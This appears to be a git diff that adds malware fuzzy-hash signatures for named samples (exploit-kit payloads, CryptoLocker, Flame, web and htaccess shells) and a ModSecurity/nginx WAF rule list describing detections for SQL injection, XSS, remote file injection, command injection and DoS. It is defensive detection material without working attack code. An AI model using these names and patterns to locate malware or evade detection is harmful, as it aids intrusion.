+12288:pAzSD+9de6L0B5WTjWOC8lyfjTtOjOpB3Iy:w9TM5IKlf15B,"image.488"
+12288:pAzSD92X0Jy4Uci16iQWoX8cBFZlkITsyG6I0L:j2EMNci1M8cBK2,"image.361"
+12288:pAzSD8yWlfXJmWrrapVxrhf0OlwyeoNtezK:yykXJmg8f0Yn,"image.457"
+12288:pAzSD8XJwesbBkn3RUsj9z8lffGLUpRtpmNm:iXJ+bBkn3RHjxkfd6A,"image.026"
+12288:pAzSD8Tyn4ZdGjLhy8b8lzThYlk1KOph22k+1cg:mTy0GjLhy8b6d1phNrcg,"image.12.002"
+12288:pAzSD8dsk8Kivj8VZe50/fKLzFkbp5/K4Mr:W6k8rE9/fcs/K,"image.545"
+12288:pAzSD8AnlpY/F1iCOxq8o5l9BsSo54fTTlknnoRT:2AjYCxO5lK4fb,"image.448"
+12288:pAzSD7yplfXJCia3/xz8o5sb8yjKoVbkULx6ejZ:ByLXJmxl5s1jjkYZ,"image.464"
+12288:pAzSD7ypJuv31hi+vGoZXh93Lxel4k1ypsSU:Ryzghi+vlhz6,"image.471"
+12288:pAzSD7SyWx+eXGkrKsbhh8lpkER1gbWv3:1SyWxzGkrbhhE1gy/,"image.3.005"
+12288:pAzSD7SyWxED38np4jhZbaLz1oopDSELOgTpT:NSyWxdpYhZbsvLOgF,"image.10.001"
+12288:pAzSD71l+5AigMz0Grp89Qw8B5CclniqaTdpA:vl+5Hz079OBY8iqOa,"image.375"
+12288:pAzSD6yp8w3Vz8otssH8lhz888lTfLTq4lNseog65Lu:IyKaltssEhz88QfKYt,"image.465"
+12288:pAzSD6XJwiX6KJcdsj1hJ8SO5HlEzo6xdm41:gXJl6KJ3j1hJ8v50Gc,"image.025"
+12288:pAzSD6uynw4vhDi88tjx8llL9Wk10Rp23s1i6wmfXNO:Yuyw4FcjxEVsLNA,"image.3.044"
+12288:pAzSD6SyiU5HUmGkrBT875SAkKopwKgU6YCof:kSyi/mGkr18I6Yrf,"image.3.008"
+12288:pAzSD6ptlU068ONTosga80fSLykVzoqtfUF:opd68ONN80f8lC,"image.017"
+12288:pAzSD6daVi2x0nkTFRTh09lyfaT5vkjOpcvZA:EoD0nkTFRTh0efmh,"image.507"
+12288:pAzSD5yMe14JCF1iEqohm8r/gjroNC6FTQO8:7y94JIhZojx6yH,"image.406"
+12288:pAzSD5yBp4i6M8qGk7FIh9l0f+8NkPpwWkT:XyBOKGk7Y4f+x2,"image.535"
+12288:pAzSD5SyOz8RDkLtljJhT8J8l0fCo2gSyAQ:DSy/RDkL/jJhT8JnfOgxx,"image.4.002"
+12288:pAzSD5NuyXJruzbVFBI+swfYhk/DKbS2vK:LNHXJrSbVFAwfYsWy,"image.049"
+12288:pAzSD5Nsqnk2vTrFbQM/w8l+WL3k56oYYbl:bNa2vZoJ6m,"image.435"
+12288:pAzSD5AnlNx1NkCkCSL1hWBfTyvkVJo67t:/AXx1NkCmhWBfP7t,"image.444"
+12288:pAzSD+54Jtqs+lD9NVoLXJhCrm8lWeTQu1Cc:o54JSlDihCi9zc,"image.428"
+12288:pAzSD4WRX8aizr1kG438Gmi2BdclifLTDVS:zRM3r1kGfGMBdhfQ,"image.369"
+12288:pAzSD4TynQHSqjc8lAThgk1KZHrgTnWqPERyeB:GTy2jjcj9XRcRyO,"image.7.002"
+12288:pAzSD4PvVmNsbukZR4GhOHlLknkERpRmJ1:WNbukZjhC+1mD,"image.028"
+12288:pAzSD4Nuy7ymrf6/kCSFjAWl8l2gO5JunB:eNH716/kC0jjNCB,"image.054"
+12288:pAzSD4/e4JnNF1iTgVkd0BjtARo7thl88QknTQ3hWHp8M:2/e4JnegVkd8hl88bs/M,"image.415"
+12288:pAzSD3zHTjRDkEbHLz1OkfopcNML+g0BvF6:VzvRDkEb/kL+gMvA,"image.4.001"
+12288:pAzSD3yWydKWcdU54lE852k46GObJwEhRTclFTEjsyTi9:FyNgUWR2k/hppA,"image.348"
+12288:pAzSD3W0/YFZFGqutUpOGVxPlni4SEe+Q:00g0tUYGBi4SJ,"image.372"
+12288:pAzSD3tx4VXwvkRtj+8ldThrtdgjcmLTsRi+jq:Ntx4Nwvkvj+AqZsRZG,"image.3.055"
+12288:pAzSD3Sy2PVU8KGkptljW8l0fC/opnSg0TH+gSTBX:xSy2UGkp/jWnfqH+gI5,"image.5.001"
+12288:pAzSD3JcaKW+CiOkorB9jGy9QThh8UtoWwe:FOCiOkorfj19Ahh8UqWwe,"image.353"
+12288:pAzSD3D+4JoPh8mNiCZn8tv8lWvk81oZ9:1K4Jgr8F9y9,"image.423"
+12288:pAzSD32wtmEF6quRJPjAtz8nrLkVlopR2Y:Z246quRdjQ8sm7,"image.1.001"
+12288:pAzSD2yf6NiV3gz8o5Nc5F9lIfFLxzlikSyKpxi36:AyCggl5o8fnCiq,"image.476"
+12288:pAzSD2TynssAz8wcQ0ThSoZgouIkiYMOE6:cTyq9vcjuIkXXV,"image.11.002"
+12288:pAzSD2SynnpIi5izB3V50bJT5xgYXoREf+2rG6A5:8SynpMBEbfxg2oREf+29m,"image.3.022"
+12288:pAzSD2SynFB1lIEJ8lgT5mNkKwdtgoo6PbJnD25Dx:oSyF7lI+rhoobhD2z,"image.3.017"
+12288:pAzSD1uynw48Ju2PhG8M5Ef4sCfUdUgumRs2yoyXQ9:Duyw4WuWhG8Rf45UdUg1s2e0,"image.3.042"
+12288:pAzSD1Synnp17aUf8lfT52gYqoe7ug+sis:fSynpIUfq2gvoe7ug31,"image.3.023"
+12288:pAzSD0/z4JMhm8r/WBGlkcVzTQqk4MIBY:2/z4JMhZ/W4VIZ,"image.407"
+12288:pAzSD0yKXJrRE87quRBejRHhwX8lkjkzpRCY0R:GyKXJrBquR0jFh4fmre,"image.033"
+12288:Ov2gKRaPmmGzESgI6RWnauGuI+vxyinVPLkFA:eMRaPhGzxgXjuGu742P4FA,"2016-07-13-pseudoDarkleech-Neutrino-EK-payload-second-run.dll"
+12288:OOTbtW8UBrhXuo2xzS5SaD4ACL+igl/Spb:OOTbTUYo2x+R7CaNl/Sp,"2016-05-24-EITest-Angler-EK-payload.exe"
+12288:oMrPGgGKzyTTZwRatJ2Py32lTggfWacanvs53x+Ut/KWwQ7XVHB80dsTgT4Kn0li:NzQ7XVHB80dsTgT4Kn0XCqXs,"plugins_full.txt"
+12288:MAbASzov5RGcqtDdbf8pdfkeTj/roHx4uewpkojCUQvQa3fJQAZ:Zb5sUcqtRCd73qiuew1CUPGvZ,"AryanRAT_March2010.zip"
+12288:Lx5jOfqEmWV+3RZfPOWf/8w1hkcV9vV+6sA9w4GOWqYarPTquHfkHB6CkaCQVF1F:NTp9v0Q9w4GOWXarPTquHfkHdLWwT,"anon.php"
+12288:LP9UI7pPBvO1cBLHTO1HMqkZh8LcwzMDHTswo/7Dq84DRDk:LPBvKcxO1MqLcCMDIwo/nkk,"CryptoLocker20Nov2013.zip"
+12288:LJ5c7xsQHbRA8Ap/ECsx1YMF1bApvLtE/+cqZejP:LksQ7RA8ANECsx1YMF1bAQmc0ej,"urvzm"
+12288:kpf/DDt+//I+YZpfipM+Risc9kq7EPN64sQPvUaTvNok2Ica4q74plzLNfkTR:kpfpKpjssZq7EPN64sLV6,"【批量下载】银河舰队大马_2014版等.zip"
+12288:JZAjsylQ/I8YNzHltrj1JBGcdsotBt2SP+0y7DGDcd3Io0oi/s6uUesm3snUbiCK:MN,"Run-EXEonRemote.ps1"
+12288:J0GfjN+Eve67rd29OcfBCeRMRMSyXt6dEMpPM5:vw/+r4OcceRMR50j,"2016-06-17-pseudoDarkleech-Neutrino-EK-payload.dll"
+12288:GT5tQ9RvqJKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK:Ogv,"ppyymxkk.exe"
+12288:Fb3Zli5mSBf6+mXd1/ZLT3FcaGG1xWtA+8so086DAUy6eUDvsWJ:pK5T9mN1/ZoL7FDAB6rDHJ,"DHL document pdf.jar"
+12288:ehkDgouVA2nxKkorvdRgQriDwOIxmxiZnYQE7PJcE4aCeGUUNyib1e67HPf8:uRmJkcoQricOIQxiZY1iaCeGHNyM7HP,"cron.jpg"
+12288:Dd7MJ7rbjxSmiThlYvl5l8anMDibzeqq+4lveAST3o0ay/G6CJbPKSRuh:DdSrbjkm938anMDi+qdJf3oAu62hq,"2017-02-22-Cerber_HELP_HELP_HELP_ACB48K7_.png"
+12288:cbZAMZmrh0KjtxuD6A+3JFNU8eB+9w8qZtlYIdSh17b9Xuz3l5SplLo5aIgFlh2Y:ct4TJxXA+ZrUbB+9JEtSh1X9XO184khz,"Skywiper-A.Flame.zip"
+12288:c2fcYQlGgvQ/QjrGFh33o3s5JbIuFBEb9ZC:x5ArGFhno85RXFub9s,"2016-04-04-ProgramData_D9E629DC-CB1C-4A97-9900-81922B4EFFD4_apds.dll"
+12288:+1/0Gu7saocG0j9M5kMA5gBY8t9FycVTUbVbojT9MLqOjdcU3T:+1/0DnocG0juy5r8t9FhV4b9otMLq4d/,"lz1493214038"
+12:25svYuI8GC+l2VP5RQXC393xlWjQ4ZbpiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiY:2+QurDVnQk3xlWjf7d,"mod_rewrite.dos.htaccess"
+12:1ZvYSBT8GC+l2485zufJ5Q3ATKaJxN7dcQKQFL9DH26LT+QQtoFtApmSi:1ZQzD4bfn3+S2yJLaHoFtLSi,"mod_rivet.shell.htaccess"
+12:1ZvYSBT8GC+l2485zufJ5Q3ATKaJxN7dcQKQFDVSJAD4426LT+QQSbFtSWOE2iDg:1ZQzD4bfn3+S2Y64La4FtS6h+Upy,"mod_mono.shell.htaccess"
+12:1Rn6otB/pP8bYG8b7cuBBudb8xEVYz4JFLa4jjRnO8QKetBZxQtKQQQXtK/EqU3Y:1RnVt55ircYuWVnOcjRnOHKqLw3MbFf,"test_shell_su.py"
+12:1E8DB9zaJgYNCxGg5G4D63rx67poBwFS4XIoCkmGG1CkmIG1ZlQ4LCzMAA5O:1EY7zaKhxH5PsrxapoBcXQ8Sxzp,"suidsgid.py"
+12:1E8bkqcG/3B17XW2YtJgYNCxGgnLoBPLg6NUql8Defyb:1EiFt3DSjKhxHnLoB8QRfyb,"rm.py"
diff --git a/nginx-waf/trusted-domains.conf b/nginx-waf/trusted-domains.conf
new file mode 100644
index 0000000..1edb90c
--- /dev/null
+++ b/nginx-waf/trusted-domains.conf
@@ -0,0 +1 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
diff --git a/nginx-waf/trusted-domains.txt b/nginx-waf/trusted-domains.txt
new file mode 100644
index 0000000..e69de29
diff --git a/nginx-waf/waf-rule-list b/nginx-waf/waf-rule-list
new file mode 100644
index 0000000..732f9c2
--- /dev/null
+++ b/nginx-waf/waf-rule-list
@@ -0,0 +1,3705 @@
+100::WARNING WARNING WARNING RULES NOT CONFIGURED!  Installation instructions not followed.
+360991::User Blacklisted IP blocked
+350000::Global RBL Match: IP is on the xbl.spamhaus.org Blacklist (Report False Positives to www.spamhaus.org)
+303800:: Fake Googlebot webcrawler
+303801:: Fake msnbot/bingbot webcrawler
+303802:: Fake Yahoo! Slurp webcrawler
+303803:: Fake Yahoo Pipes webcrawler
+303804:: Fake Yeti webcrawler
+303805:: Fake Hailoobot webcrawler.
+303806:: Fake Technoratibot webcrawler.
+303807:: Fake FriendFeed/Facebook webcrawler
+303808:: Fake Yandex webcrawler.
+303810:: Fake Bloglines webcrawler.
+303811:: Fake Gist webcrawler
+303812:: Fake BlogScope webcrawler
+303813:: Fake NewsGatorOnline webcrawler
+303814:: Fake Netvibes webcrawler
+303831:: Fake twitter bot
+303833:: Fake Google Feedfetcher webcrawler
+303890:: Fake Feedly webcrawler
+303937:: Fake Baidu webcrawler
+350051:: Threat Intelligence Match for known Worm Source on Atomicorp Threat Intelligence RBL.  See this URL for details http://www.atomicrbl.com (Previous TI Match)
+355500:: Threat Intelligence Match for known Worm Source on Atomicorp Threat Intelligence RBL (TI-1).  See this URL for details http://www.atomicrbl.com
+330791::Failed to parse request body.  This may be an impedence mismatch attack, a broken application or a broken connection.  This is not a false positive.  Check your application or client for errors.
+340152::Request Body Parsing Failed. %{REQBODY_PROCESSOR_ERROR_MSG}: check your application or client for errors, this is not a false positive.
+390700:: Evasion Attack: Invalid filename in FILES argument. Which may be a possible attempt at multipart/form-data bypass
+314681:: Invalid HTTP method detected
+330700:: Invalid HTTP Request Line in violation of RFC (if you do not wish to follow HTTP RFCs, disable this rule)
+330773:: client redefining HTTP_PROXY value denied
+330792::Multipart parser detected a possible unmatched boundary. This may be an impedence mismatch attack, a broken application or a broken connection.  This is not a false positive.  Check your application or client for errors.
+330793::Multipart request body failed strict validation:  PE %{REQBODY_PROCESSOR_ERROR},  BQ %{MULTIPART_BOUNDARY_QUOTED},  BW %{MULTIPART_BOUNDARY_WHITESPACE},  DB %{MULTIPART_DATA_BEFORE},  DA %{MULTIPART_DATA_AFTER},  HF %{MULTIPART_HEADER_FOLDING},  LF %{MULTIPART_LF_LINE},  SM %{MULTIPART_SEMICOLON_MISSING},  IQ %{MULTIPART_INVALID_QUOTING},  IH %{MULTIPART_INVALID_HEADER_FOLDING},  IP %{MULTIPART_INVALID_PART},  FL %{MULTIPART_FILE_LIMIT_EXCEEDED}
+331030:: Suspicious activity detected - HTTP Request Missing a Host Header
+331031:: Suspicious activity detected - Empty Host Header detected in HTTP request
+331032:: Suspicious activity detected - Host header is a numeric IP address
+350708::ModSecurity internal error flagged: %{MATCHED_VAR_NAME}
+350709::Request Body Larger than SecRequestBodyLimit Setting
+350710::Response Body Larger than SecResponseBodyLimit Setting
+356331:: Code injection in HTTP header attack blocked
+356332:: invalid characters in User-Agent header
+390621:: Unicode Width Attack Attempt
+390703:: Possible URL Encoding Abuse Attack Attempt
+390704:: Possible Encoding Abuse Attack Attempt
+390708:: Session Fixation Attack
+390713::  HTTP Response Splitting Attack
+390714:: HTTP Splitting (CR/LF in request filename detected)
+390716:: URL file extension is restricted by policy
+390718:: Session Fixation Attack
+390720:: Possible Impedence Mismatch attack on PHP appliction using space to start argument name
+390722:: HTTP Header Injection Attack via payload (CR/LF detected)
+390739:: Possible Session Fixation attack
+390763:: Command Line style Encoding Abuse Attack Attempt
+391213:: Request content type is not allowed by policy
+300111:: HTTP Smuggling Attack: Multiple Content-Length headers detected
+300112:: HTTP Smuggling Attack: Multiple Transfer-Encoding headers detected
+300113:: HTTP Smuggling Attack: Both Content-Length and Transfer-Encoding headers detected
+300114:: HTTP Smuggling Attack: Inconsistent Content-Length and Transfer-Encoding headers detected
+365903:: User Block based on Custom Domain List
+365904:: Referrer Blocked based on Users Custom Domain List
+331215:: CtrlFunc Brute Force Attack Dropped
+331216:: Wordpress DOS Attack Dropped
+331217:: Possible DOS Attack Dropped
+343434:: Client Connection dropped by Apache due to slow connection, possible Slowaris attack
+350114:: Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}
+350116:: Potential Denial of Service (DoS) Attack Identified from %{tx.real_ip} (%{tx.dos_block_counter} hits since last alert)
+370145:: Known wormsign
+390639:: Just In Time Patch: WordPRess trackback resource exhaustion attack
+390640:: Just In Time Patch: WordPRess trackback resource exhaustion attack
+392331:: xmlrpc DOS attack
+343463::HoneyTrap Alert: Disallowed robots.txt Entry Accessed.
+343464::Atomicorp.com Honeypot Rules: Probe for honeypot or non-existant web application.
+330790::Apache Error: Invalid URI in Request.  This event is not caused by this rule.  This rule is just reporting  a critical apache error.
+360000::Atomicorp.com Malware Blocklist: Malware Site detected in URL/Argument (AE)
+360005::Atomicorp.com Malware Blocklist:  Malware Site detected in ARGS/Body (AE)
+310618:: Generic XSS filter
+310716:: Cross Site Scripting Attack
+310717:: Cross Site Scripting Attack
+310718:: Generic XSS filter
+320162:: Remote File Injection attempt in ARGS (AE)
+320163:: Remote File Injection attempt in ARGS (MM)
+320164:: Remote File Injection attempt in ARGS (AE)
+320165:: Remote File Injection attempt in ARGS (MM)
+320462:: Remote File Injection attempt in ARGS (modules.php)
+320463:: Remote File Injection attempt in ARGS (modules.php)
+320464:: Protected Path Access denied in URI/ARGS
+320465:: Attempt to Access protect file Remotely
+320466:: Attempt to Access protect file Remotely
+320468:: Remote File Injection attempt in ARGS (modules.php)
+320469:: Remote File Injection attempt in ARGS (modules.php)
+320470:: Generic XSS filter
+320471:: Cross Site Scripting Attack
+320472:: Cross Site Scripting Attack
+320473:: Remote File Injection attempt in ARGS (MM)
+320474:: Generic XSS filter
+320475:: Cross Site Scripting Attack
+320476:: Cross Site Scripting Attack
+320486:: Generic Path Recursion denied
+320487:: Generic Path Recursion denied
+320572:: Remote File Injection attempt in ARGS (AE)
+321463:: Protected Path Access denied in URI/ARGS
+321464:: Generic Path Recursion denied
+321486:: Protected Path Access denied in URI/ARGS
+330162:: Remote File Injection attempt in ARGS (AE)
+330163:: Remote File Injection attempt in ARGS (MM)
+330475:: Remote File Injection attempt in ARGS (mt.cgi)
+330476:: Remote File Injection attempt in ARGS (mt.cgi)
+330477:: Remote File Injection attempt in ARGS (AE)
+330478:: Remote File Injection attempt in ARGS (MM)
+330707:: Too many cookies in request (max set to 1000, increase as necessary for your system)
+330708:: Possible CSRF attack
+333140:: JavaScript global variable found
+333141:: Potential XSS Attack detected
+336133:: Remote File Injection attempt in ARGS (AE)
+336134:: Remote File Injection attempt in ARGS (MM)
+336135:: Remote File Injection attempt in ARGS (AE)
+336136:: Remote File Injection attempt in ARGS (MM)
+336137:: Remote File Injection attempt in ARGS (AE)
+336138:: Remote File Injection attempt in ARGS (MM)
+336139:: Remote File Injection attempt in ARGS (AE)
+336140:: Remote File Injection attempt in ARGS (MM)
+336141:: Remote File Injection attempt in ARGS (AE)
+336142:: Remote File Injection attempt in ARGS (MM)
+336240:: Remote File Injection attempt in ARGS (AE)
+336241:: Remote File Injection attempt in ARGS (MM)
+336242:: Remote File Injection attempt in ARGS (AE)
+336243:: Remote File Injection attempt in ARGS (MM)
+336244:: Remote File Injection attempt in ARGS (AE)
+336245:: Remote File Injection attempt in ARGS (MM)
+336633:: Remote File Injection attempt in ARGS (AE)
+336634:: Remote File Injection attempt in ARGS (MM)
+340002:: TRACE/TRACK method denied
+340003:: XSS attack in request headers
+340007:: Generic Path Recursion denied
+340008:: Bogus Path denied
+340009:: Protected Path Access denied in URI/ARGS
+340011:: Generic PHP exploit pattern denied
+340012:: Unauthorized Proxy access attempt
+340013:: Generic SQL injection in cookie or UA
+340014:: CMD injection
+340016:: Attack Blocked -  SQL injection attempt detected
+340017:: Generic SQL injection protection in ARGS
+340019:: Generic PHP bad functions protection
+340023:: Attack Blocked -  remote command execution
+340029:: Attack Blocked - command in REQUEST_URI or Argument
+340030:: Pipe command line probe
+340031:: Remote file inclusion
+340035:: Bogus file extensions
+340039:: PHP command injection attempt
+340069:: Web vulnerability scanner
+340076:: PHP Session attack
+340077:: PHP policy violation
+340079:: PHP policy violation
+340082:: SMTP redirect over http attempt
+340087:: Attack Blocked -  PHP function in URL - this may be an attack.
+340095:: Attack Blocked -  PHP function in Argument - this may be an attack.
+340096:: PHP policy violation
+340097:: Tomcat view source attempt
+340099:: cross site scripting attempt
+340102:: cross site scripting attempt
+340106:: cross site scripting attempt STYLE + EXPRESSION
+340109:: cross site scripting attempt using XML
+340110:: cross site scripting attempt executing hidden Javascript
+340112:: cross site scripting attempt to execute Javascript code
+340113:: Potential attempt to inject javascript 
+340114:: Apache admin service access attempt
+340116:: Common HTTP vulnerability
+340117:: General [url] php forum protections
+340118:: Generic XML-RPC attack
+340120:: Generic XML-RPC  attack
+340121:: XML-RPC attacks on xmlrpc.php
+340122:: XML-RPC SQL injection 
+340123:: XML-RPC base64 encoded SQL injection 
+340128:: Remote PHP command exection
+340130:: AngularJS client side template injection detected
+340133:: HTTP header PHP code injection attack
+340134:: Worm signature
+340138:: Fake image file shell attack
+340140:: Bogus graphics file
+340141:: Attack Blocked -  upload attack - Attempt to upload a non-graphics file as a graphics file blocked
+340142:: Special account protection
+340144:: Generic SQL injection protection 2
+340145:: Attack Blocked -  SQL injection probe
+340146:: Generic SQL metacharacter URI injection protection
+340147:: Potential Cross Site Scripting Attack
+340148:: Potential Cross Site Scripting Attack
+340149:: Potential Cross Site Scripting Attack
+340155:: Generic SQL Injection protection
+340156:: Generic SQL injection protection
+340157:: Generic SQL inline command protection
+340158:: XSS in referrer
+340159:: Generic SQL inline command protection (MM)
+340162:: Remote File Injection Attack detected (Unauthorized URL detected as argument)
+340163:: Remote File Injection Attack Blocked (Unauthorized URL detected as argument)
+340164:: SQL Injection Attack
+340165:: Uniencoded possible Remote File Injection attempt in URI (AE)
+340181:: Generic SQL inline command protection
+340193:: CMD injection in URI
+340195:: Attack Blocked -  Base64 Encoded PHP function in Argument - this may be an attack.
+340210:: cross site scripting stealth attempt to access shell
+340211:: cross site scripting stealth attempt to access shell
+340213:: LDAP Injection Attack
+340218:: Bogus Path denied (base64 encoded)
+340247:: Potential Cross Site Scripting Attack
+340248:: Potential Cross Site Scripting Attack
+340249:: Potential Cross Site Scripting Attack
+340361:: CONNECT method denied
+340362:: ModSecurity does not support content encodings and can not detect attacks using it, therefore it must be blocked.
+340444:: Generic SQL injection protection (/forums/newreply.php)
+340457:: Generic SQL inline command protection (/admin/index.php exclude)
+340462:: Remote File Injection attempt in ARGS (modules.php)
+340463:: Remote File Injection attempt in ARGS (modules.php)
+340464:: Remote File Injection attempt in ARGS (admin.php)
+340465:: Remote File Injection attempt in ARGS (admin.php)
+340466:: Remote File Injection attempt in ARGS (cpinquiry.php)
+340467:: Remote File Injection attempt in ARGS (cpinquiry.php)
+340468:: Remote File Injection attempt in ARGS (save-page.php)
+340469:: Remote File Injection attempt in ARGS (save-page.php)
+340470:: Remote File Injection attempt in ARGS (guestbook.pl)
+340471:: Remote File Injection attempt in ARGS (guestbook.pl)
+340472:: Remote File Injection attempt in ARGS (/modules/wysiwyg/save.php)
+340473:: Remote File Injection attempt in ARGS (/modules/wysiwyg/save.php)
+340476:: Remote File Injection attempt in ARGS (/admin/index.php exclude)
+340477:: Remote File Injection attempt in ARGS (/admin/index.php exclude)
+340478:: Remote File Injection attempt in ARGS (/forums/admincp/user.php)
+340479:: Remote File Injection attempt in ARGS (/forums/admincp/user.php)
+340482:: Remote File Injection attempt in ARGS (/forum/admincp/template.php)
+340483:: Remote File Injection attempt in ARGS (/forum/admincp/template.php)
+340484:: Remote File Injection attempt in ARGS (contact.php)
+340485:: Remote File Injection attempt in ARGS (contact.php)
+340486:: Remote File Injection attempt in ARGS (/admin/conf.php)
+340487:: Remote File Injection attempt in ARGS (/admin/conf.php)
+340488:: Remote File Injection attempt in ARGS (/admin/posted/edit_listing.php)
+340489:: Remote File Injection attempt in ARGS (/admin/posted/edit_listing.php)
+340490:: Remote File Injection attempt in ARGS (/forums/private.php)
+340491:: Remote File Injection attempt in ARGS (/forums/private.php)
+340492:: Remote File Injection attempt in ARGS (/forums/newreply.php)
+340493:: Remote File Injection attempt in ARGS (/forums/newreply.php)
+340494:: Remote File Injection attempt in ARGS (/forums/newreply.php)
+340495:: Remote File Injection attempt in ARGS (/forums/newreply.php)
+340496:: Remote File Injection attempt in ARGS (/links.php)
+340497:: Remote File Injection attempt in ARGS (/links.php)
+340498:: Generic SQL injection protection (/forums/newreply.php)
+340499:: Remote File Injection attempt in ARGS (/wysiwyg-edit)
+340500:: Remote File Injection attempt in ARGS (/wysiwyg-edit)
+340503:: Remote File Injection attempt in ARGS (/cgi-bin/mt4/mt-comments.cgi)
+340504:: Remote File Injection attempt in ARGS (/cgi-bin/mt4/mt-comments.cgi)
+340505:: Remote File Injection attempt in ARGS (/ubbthreads/admin/dogen_display.php)
+340506:: Remote File Injection attempt in ARGS (/ubbthreads/admin/dogen_display.php)
+340509:: Remote File Injection attempt in ARGS (/modernbill5/app-modernbill-admin/clients.php)
+340510:: Remote File Injection attempt in ARGS (/modernbill5/app-modernbill-admin/clients.php)
+340511:: Remote File Injection attempt in ARGS (/cgi-bin/database/dbpro.cgi)
+340512:: Remote File Injection attempt in ARGS (/cgi-bin/database/dbpro.cgi)
+340515:: Generic SQL injection protection (/admin/patch.php)
+340517:: Remote File Injection attempt in ARGS (/images/logdnet.php)
+340518:: Remote File Injection attempt in ARGS (/images/logdnet.php)
+340519:: Remote File Injection attempt in ARGS (/contact_form.php)
+340520:: Remote File Injection attempt in ARGS (/contact_form.php)
+340521:: Remote File Injection attempt in ARGS (/forum/register.ph)
+340522:: Remote File Injection attempt in ARGS (/forum/register.ph)
+340523:: Remote File Injection attempt in ARGS (/manager/index.php)
+340524:: Remote File Injection attempt in ARGS (/manager/index.php)
+340525:: Remote File Injection attempt in ARGS (/cgi-bin/class/class_add.pl)
+340526:: Remote File Injection attempt in ARGS (/cgi-bin/class/class_add.pl)
+340527:: Remote File Injection attempt in ARGS (/insert_image)
+340528:: Remote File Injection attempt in ARGS (/insert_uimage)
+340529:: Remote File Injection attempt in ARGS ( /administration/news.php)
+340530:: Remote File Injection attempt in ARGS (/administration/news.php)
+340531:: Remote File Injection attempt in ARGS (/admin/editor.php)
+340532:: Remote File Injection attempt in ARGS (/admin/editor.php)
+340533:: Remote File Injection attempt in ARGS (/cgi-sys/FormMail.cgi)
+340544:: Remote File Injection attempt in ARGS (/cgi-sys/FormMail.cgi)
+340545:: Remote File Injection attempt in ARGS (/frame.aspx)
+340546:: Remote File Injection attempt in ARGS (/frame.aspx)
+340547:: Remote File Injection attempt in ARGS (/spaw/gethref.php)
+340548:: Remote File Injection attempt in ARGS (/spaw/gethref.php)
+340549:: Remote File Injection attempt in ARGS (/cgi-bin/mt/mt.fcgi)
+340550:: Remote File Injection attempt in ARGS (/cgi-bin/mt/mt.fcgi)
+340551:: Remote File Injection attempt in ARGS (/runmodule.php)
+340552:: Remote File Injection attempt in ARGS (/runmodule.php)
+340553:: Remote File Injection attempt in ARGS (/admin/frame.php)
+340554:: Remote File Injection attempt in ARGS (/admin/frame.php)
+340555:: Remote File Injection attempt in ARGS (/videos/install)
+340556:: Remote File Injection attempt in ARGS (/videos/install)
+340557:: Remote File Injection attempt in ARGS (/support/staff/index.php)
+340558:: Remote File Injection attempt in ARGS (/support/staff/index.php)
+340559:: Remote File Injection attempt in ARGS (/cgi-bin/procform.pl)
+340560:: Remote File Injection attempt in ARGS (/cgi-bin/procform.pl)
+340561:: Remote File Injection attempt in ARGS (/admin/editcontent.php)
+340562:: Remote File Injection attempt in ARGS (/admin/editcontent.php)
+340563:: Remote File Injection attempt in ARGS (/html2rss/rss.aspx)
+340564:: Remote File Injection attempt in ARGS (/html2rss/rss.aspx)
+340565:: Remote File Injection attempt in ARGS ( /winnder_step2.1.php)
+340566:: Remote File Injection attempt in ARGS ( /winnder_step2.1.php)
+340567:: Remote File Injection attempt in ARGS (/contact/website.php )
+340568:: Remote File Injection attempt in ARGS (/contact/website.php )
+340569:: Remote File Injection attempt in ARGS (/wbb/acp/template.php)
+340570:: Remote File Injection attempt in ARGS (/wbb/acp/template.php)
+340571:: Remote File Injection attempt in ARGS (/phpmysupport/trackerimage.php)
+340572:: Remote File Injection attempt in ARGS (/phpmysupport/trackerimage.php)
+340573:: Remote File Injection attempt in ARGS (/chat.php)
+340574:: Remote File Injection attempt in ARGS (/chat.php)
+340577:: Remote File Injection attempt in ARGS (/egroupware/etemplate/process_exec.php)
+340578:: Remote File Injection attempt in ARGS (/egroupware/etemplate/process_exec.php)
+340581:: Remote File Injection attempt in ARGS (/acollab/install/install.php)
+340582:: Remote File Injection attempt in ARGS (/acollab/install/install.php)
+340583:: Remote File Injection attempt in ARGS (/includes/popup.php)
+340584:: Remote File Injection attempt in ARGS (/includes/popup.php)
+340585:: Remote File Injection attempt in ARGS (/cgi-bin/cgiemail/testform.txt)
+340586:: Remote File Injection attempt in ARGS (/cgi-bin/cgiemail/testform.txt)
+340587:: Remote File Injection attempt in ARGS (/ubbthreads/admin/doeditboard.php)
+340588:: Remote File Injection attempt in ARGS (/ubbthreads/admin/doeditboard.php)
+340589:: Remote File Injection attempt in ARGS (/anyinventory/admin/item_processor.php)
+340590:: Remote File Injection attempt in ARGS (/anyinventory/admin/item_processor.php)
+340591:: Remote File Injection attempt in ARGS (/default/browser.html)
+340592:: Remote File Injection attempt in ARGS (/default/browser.html)
+340593:: Remote File Injection attempt in ARGS
+340596:: Remote File Injection attempt in ARGS
+340597:: Remote File Injection attempt in ARGS
+340598:: Remote File Injection attempt in ARGS (/cgi-sys/FormMail.cgi)
+340599:: Remote File Injection attempt in ARGS (/cgi-sys/FormMail.cgi)
+340600:: Remote File Injection attempt in ARGS
+340601:: Remote File Injection attempt in ARGS
+340602:: Remote File Injection attempt in ARGS
+340603:: Remote File Injection attempt in ARGS
+340604:: Remote File Injection attempt in ARGS
+340605:: Remote File Injection attempt in ARGS
+340607:: Remote File Injection attempt in ARGS
+340608:: Remote File Injection attempt in ARGS
+340609:: Remote File Injection attempt in ARGS
+340610:: Remote File Injection attempt in ARGS
+340611:: Remote File Injection attempt in ARGS
+340612:: Remote File Injection attempt in ARGS
+340613:: Remote File Injection attempt in ARGS
+340614:: Remote File Injection attempt in ARGS
+340615:: Remote File Injection attempt in ARGS
+340616:: Remote File Injection attempt in ARGS
+340617:: Remote File Injection attempt in ARGS
+340618:: Remote File Injection attempt in ARGS
+340619:: Remote File Injection attempt in ARGS
+340620:: Remote File Injection attempt in ARGS
+340621:: Remote File Injection attempt in ARGS
+340622:: Remote File Injection attempt in ARGS
+340623:: Remote File Injection attempt in ARGS
+340624:: Remote File Injection attempt in ARGS
+340625:: Remote File Injection attempt in ARGS
+340626:: Remote File Injection attempt in ARGS
+340627:: Remote File Injection attempt in ARGS
